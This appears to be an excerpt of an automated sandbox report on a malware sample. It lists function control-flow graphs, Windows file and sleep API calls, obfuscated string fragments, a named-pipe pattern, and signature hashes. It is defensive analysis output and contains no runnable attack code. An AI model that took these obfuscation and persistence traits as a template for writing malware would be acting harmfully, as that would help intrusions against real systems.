28f45bf-28f45c6 225->236 231 28f4126-28f4130 226->231 232 28f4132-28f414c 226->232 230 28f4580-28f4582 228->230 229->230 230->225 234 28f4584-28f4589 230->234 235 28f4152-28f4154 231->235 232->235 237 28f458b-28f4595 234->237 238 28f4597-28f459f 234->238 235->193 239 28f415a-28f4161 235->239 236->177 240 28f45cc-28f45d4 236->240 237->225 238->225 241 28f416f-28f4189 239->241 242 28f4163-28f416d 239->242 240->132 243 28f45d6-28f45db 240->243 244 28f418f-28f4191 241->244 242->244 243->132 243->177 244->193 245 28f4197-28f419e 244->245 246 28f41ac-28f41c6 245->246 247 28f41a0-28f41aa 245->247 248 28f41cc-28f41ce 246->248 247->248 248->193 249 28f41d4-28f41db 248->249 250 28f41dd-28f41e7 249->250 251 28f41e9-28f4200 249->251 252 28f4206-28f4208 250->252 251->252 252->193 253 28f420e-28f4215 252->253 254 28f4217-28f4221 253->254 255 28f4223-28f4239 253->255 256 28f423f-28f4241 254->256 255->256 256->193 257 28f4247-28f424e 256->257 258 28f425c-28f4273 257->258 259 28f4250-28f425a 257->259 260 28f4279-28f427b 258->260 259->260 260->193 261 28f4281-28f4288 260->261 262 28f428a-28f4294 261->262 263 28f4296-28f42ac 261->263 264 28f42b2-28f42b4 262->264 263->264 264->193 265 28f42ba-28f42c0 264->265 266 28f42ce-28f42fd call 2906e30 265->266 267 28f42c2-28f42cc 265->267 268 28f4303-28f4305 266->268 267->268 268->193 271 28f430b-28f4312 268->271 272 28f4314-28f431e 271->272 273 28f4320-28f4337 271->273 274 28f433d-28f433f 272->274 273->274 274->193 275 28f4345-28f434c 274->275 276 28f434e-28f4358 275->276 277 28f435a-28f4371 275->277 278 28f4377-28f4379 276->278 277->278 278->193 279 28f437f-28f4386 278->279 280 28f4388-28f4392 279->280 281 28f4394-28f43ab 279->281 282 28f43b1-28f43b3 280->282 281->282 282->193 283 28f43b9-28f43c0 282->283 284 28f43ce-28f43e5 283->284 285 28f43c2-28f43cc 283->285 286 28f43eb-28f43ed 284->286 285->286 286->193 287 28f43f3-28f43fa 286->287 288 28f43fc-28f4406 287->288 289 28f4408-28f441f 287->289 290 28f4425-28f4427 288->290 289->290 290->193 291 28f4429-28f4430 290->291 292 28f443e-28f4455 291->292 293 28f4432-28f443c 291->293 294 28f445b-28f445d 292->294 293->294 294->193 295 28f445f-28f4466 294->295 296 28f4468-28f4472 295->296 297 28f4474-28f447c 295->297 296->193 297->193
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2573641714.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                      • Associated: 00000008.00000002.2573620459.00000000028F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573691251.0000000002914000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573709719.0000000002916000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573726264.0000000002918000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573753992.000000000294C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573778595.0000000002952000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2574011960.0000000002B45000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_28f0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TCLService$\\.\pipe\%s$ntsvcs
                                                      • API String ID: 0-2389069860
                                                      • Opcode ID: 2410c69ba36dfc152989daa0538838d8773e1888ba581d26efc123da90528e95
                                                      • Instruction ID: 884ea90c79738166184b2a60f82138b1a0007f3211579366a4dfe2197b0855e2
                                                      • Opcode Fuzzy Hash: 2410c69ba36dfc152989daa0538838d8773e1888ba581d26efc123da90528e95
                                                      • Instruction Fuzzy Hash: F33208BA6092C68EE774CF35C9543EA3762F39434CF54813AC70A9AE4CEBB1D6459B40
                                                      Function 0062E7E5 Relevance: 87.6, APIs: 2, Strings: 48, Instructions: 98COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 62 62e7e5-62e92d call 628ab5 * 2 GetFileAttributesA 67 62e933-62e93c 62->67 68 62e92f-62e931 62->68 70 62e942-62e95f SetFileAttributesA 67->70 71 62e93e-62e940 67->71 69 62e96a-62e971 68->69 72 62e961-62e963 70->72 73 62e965 70->73 71->69 72->69 73->69
                                                      APIs
                                                      • GetFileAttributesA.KERNEL32 ref: 0062E920
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID: .$2$3$A$A$A$A$F$F$G$S$b$b$d$e$e$e$e$e$e$e$e$i$i$i$i$k$l$l$l$l$l$n$r$r$r$s$s$t$t$t$t$t$t$t$t$u$u
                                                      • API String ID: 3188754299-970789115
                                                      • Opcode ID: 87bb6b810beafd5e56fe44c18cd7a01b0a1985ad6d6227ac30147871eff9ff27
                                                      • Instruction ID: 419c5d6588e5c8604a32263b15a7dce3b28d0ce93ba3af59cc76bde77c928ad4
                                                      • Opcode Fuzzy Hash: 87bb6b810beafd5e56fe44c18cd7a01b0a1985ad6d6227ac30147871eff9ff27
                                                      • Instruction Fuzzy Hash: D151802050C7C0CEE352C628C44875BBFE26BA2748F48499DB1C98A392D7FF9558C767
                                                      Function 0062BA35 Relevance: 57.8, APIs: 2, Strings: 31, Instructions: 98fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 74 62ba35-62bba5 call 628ab5 * 3 CreateFileA 81 62bba7-62bbcf WriteFile 74->81 82 62bbd8-62bbdf 74->82 83 62bbd7 81->83 83->82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: File$CreateWrite
                                                      • String ID: A$C$C$F$F$H$W$a$a$d$e$e$e$e$e$e$e$i$i$i$l$l$l$l$n$o$r$r$s$t$t
                                                      • API String ID: 2263783195-3987612189
                                                      • Opcode ID: 305012309f1f506a9ae185b57c22c1c419adf828ac335499a933d71724a0fa4a
                                                      • Instruction ID: 4433212542230bb6ff2c8d9d205a830695f64a4a8101033250b4a7186f4703a9
                                                      • Opcode Fuzzy Hash: 305012309f1f506a9ae185b57c22c1c419adf828ac335499a933d71724a0fa4a
                                                      • Instruction Fuzzy Hash: 4541D23010CBC4CEE361DB28C44875FFFD1ABA2709F14495D91D9872A2CBBA8558DB67
                                                      Function 006292A5 Relevance: 56.1, APIs: 1, Strings: 31, Instructions: 83COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 84 6292a5-629398 call 628ab5 * 2 SleepEx 90 6293a0-6293c3 84->90 91 6293c5-6293ca 90->91 92 6293ce 90->92 93 6293d0-6293d4 91->93 92->93
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: .$2$3$4$6$C$G$S$T$c$d$e$e$e$e$e$i$k$k$l$l$l$l$n$n$o$p$r$t$t$u
                                                      • API String ID: 3472027048-1678096204
                                                      • Opcode ID: f23281ce99727d82e4429899fda81e9298da085c9400dda77c106ed9c0d8467d
                                                      • Instruction ID: 448b5b4bde8bb151a04ded52a7db17555ba2349999b13b08aaa72d99a5994c86
                                                      • Opcode Fuzzy Hash: f23281ce99727d82e4429899fda81e9298da085c9400dda77c106ed9c0d8467d
                                                      • Instruction Fuzzy Hash: 0D419D2050CBC48AE742D768844875FFFD2ABA6748F48099DB0C98A392C6FAC558C767
                                                      Function 006291B5 Relevance: 54.3, APIs: 1, Strings: 30, Instructions: 59COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 94 6291b5-629284 call 628ab5 GetFileAttributesA 97 629286-62928f 94->97 98 629298 94->98 97->98 99 629291-629296 97->99 100 62929a-62929e 98->100 99->100
                                                      APIs
                                                      • GetFileAttributesA.KERNEL32 ref: 00629277
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID: .$2$3$A$A$F$G$b$d$e$e$e$e$e$i$i$k$l$l$l$l$n$r$r$s$t$t$t$t$u
                                                      • API String ID: 3188754299-2392786682
                                                      • Opcode ID: 04168a18ef9139a812866acbdbe25316e2cb333e53e11c57863f81b89438e9d5
                                                      • Instruction ID: 6ae65ad1b0ebe7193e567afa153492b3169c9d0e03622ec2f751ac9f85b5de5e
                                                      • Opcode Fuzzy Hash: 04168a18ef9139a812866acbdbe25316e2cb333e53e11c57863f81b89438e9d5
                                                      • Instruction Fuzzy Hash: 9C31612041C7C0D9E362D628C48875FBFE26BA3748F88199DB2C44A292D7FF8558C727
                                                      Function 0062AEF5 Relevance: 33.4, APIs: 1, Strings: 18, Instructions: 117COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,-00000003,0062DD8F), ref: 0062AFD6
                                                        • Part of subcall function 0062E7E5: GetFileAttributesA.KERNEL32 ref: 0062E920
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile
                                                      • String ID: A$C$D$a$b.qqqq\:v$c$e$e$e$i$o$peelS$r$r$r$t$t$y
                                                      • API String ID: 3401506121-3195934931
                                                      • Opcode ID: 79a0a39577bae7287bb455bf0b90777d0d2de0e0be1f0a6853e8eddb745c8297
                                                      • Instruction ID: fdcb39354d7cd57bc9a4834de0208e8fd2d42fab7d627e126247eeee8e753a53
                                                      • Opcode Fuzzy Hash: 79a0a39577bae7287bb455bf0b90777d0d2de0e0be1f0a6853e8eddb745c8297
                                                      • Instruction Fuzzy Hash: C4414F3100CB888FD746E718D5446DBBBD2FBA5304F044A6DB0CA87295DEB99648CB9B

                                                      Non-executed Functions

                                                      Function 0062B085 Relevance: 131.6, Strings: 105, Instructions: 351COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 357 62b085-62b4bd call 62eb45 call 628ab5 * 8 376 62b4c4-62b4c9 357->376 377 62b754-62b75f 376->377 378 62b4cf-62b4dc 376->378 378->377 379 62b4e2-62b524 378->379 381 62b52a-62b569 379->381 382 62b73b-62b740 379->382 386 62b72b-62b73a 381->386 387 62b56f-62b58b 381->387 383 62b742-62b74e 382->383 384 62b74f 382->384 383->384 384->376 386->382 389 62b596-62b5ba 387->389 392 62b6d2-62b6da 389->392 393 62b5c0-62b5c5 389->393 395 62b6e7-62b6f0 392->395 393->392 394 62b5cb-62b5de 393->394 396 62b5e4-62b638 394->396 397 62b699-62b6e1 call 62ac15 394->397 398 62b6f2-62b713 395->398 399 62b71b-62b72a 395->399 406 62b63a-62b68d call 62ac15 396->406 407 62b68f-62b697 396->407 397->389 397->395 398->399 399->386 406->397 407->395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$A$A$A$C$F$F$GAOrI$H$H$H$HpS$I$I$I$I$O$O$R$S$U$a$a$a$a$c$c$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$i$i$i$l$l$l$l$l$l$l$l$l$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$t$t$t$t$t$t$t$t$t$w
                                                      • API String ID: 0-515521434
                                                      • Opcode ID: c976aab0f775c25f95919249f3c08615063415f290fb3655b1620a153c3b787e
                                                      • Instruction ID: 011104e09dfbfd66b730e48d424f9c28ee10c40666fd92e1dac5a7624bfc2dc2
                                                      • Opcode Fuzzy Hash: c976aab0f775c25f95919249f3c08615063415f290fb3655b1620a153c3b787e
                                                      • Instruction Fuzzy Hash: 3502A73010C7C4CEE772DB28C44879FBFD2ABA6709F04495D91CD86292CBBA5558CB67
                                                      Function 0062EAF5 Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb87282369c2248f9bec853ac7d1d5c57026666bbbbcfbeb5fe557e72dfe5db0
                                                      • Instruction ID: b3cfd294af26ae3512fc89e71279f0c51f5d5a0b222a415b97d77da74408e477
                                                      • Opcode Fuzzy Hash: eb87282369c2248f9bec853ac7d1d5c57026666bbbbcfbeb5fe557e72dfe5db0
                                                      • Instruction Fuzzy Hash: 2DD0C714330E380DF76C015C1E6E37471C1E768943FD0427E9406E19D1E846D4C18186
                                                      Function 00628100 Relevance: 110.5, APIs: 1, Strings: 62, Instructions: 203COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 488 628100-628553 call 628ab5 * 2 call 62a7a5 call 6291b5 498 628555-628557 488->498 499 62855c-628563 call 6292a5 488->499 500 62876a-628771 498->500 503 628565-628567 499->503 504 62856c-628573 call 62eaf5 499->504 503->500 507 628575-628577 504->507 508 62857c-628583 call 628f65 504->508 507->500 511 628751-628767 call 6296b5 SleepEx 508->511 512 628589-62860b call 628ab5 508->512 521 628768 511->521 517 628616-62861d call 628f65 512->517 522 628623-62862b 517->522 523 6286c9-6286d5 517->523 521->500 522->523 524 628631-628639 522->524 527 6286e0-6286e7 call 628f65 523->527 525 628645-62864a 524->525 528 6286b4-6286c4 525->528 529 62864c-628696 525->529 533 6286e9-6286f1 527->533 534 62872e-628736 call 628f65 527->534 528->517 535 62869a-6286ae call 628f65 529->535 536 628698 529->536 533->534 537 6286f3-62872c 533->537 542 628738-628749 call 6296b5 call 62d535 534->542 543 62874f 534->543 550 6286b2 535->550 551 6286b0 535->551 538 62863b-628641 536->538 537->527 538->525 554 62874e 542->554 543->521 550->538 551->528 554->543
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2572300778.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Offset: 00628000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_628000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID: .$.$.$2$2$3$3$:$A$B$C$M$S$T$\$a$a$a$b$b$d$d$d$d$e$e$e$e$e$e$e$e$e$e$g$g$h$k$l$l$l$l$l$l$n$o$p$q$q$q$q$r$r$r$r$s$s$s$t$u$v$x
                                                      • API String ID: 3188754299-41237169
                                                      • Opcode ID: 278bb6a0c95df8cbe6b0dc37eb8a9394ebad8f402e8faf3dab616e8676553c30
                                                      • Instruction ID: 17fba7120d488fd5ac1897f5fa2122fd3e5a91e932faf65278be2fe6bcfc553b
                                                      • Opcode Fuzzy Hash: 278bb6a0c95df8cbe6b0dc37eb8a9394ebad8f402e8faf3dab616e8676553c30
                                                      • Instruction Fuzzy Hash: BBA12B2010DBD0CDE362D738D44879FBFD2ABA2348F54495DA1C987292CFBA8559CB27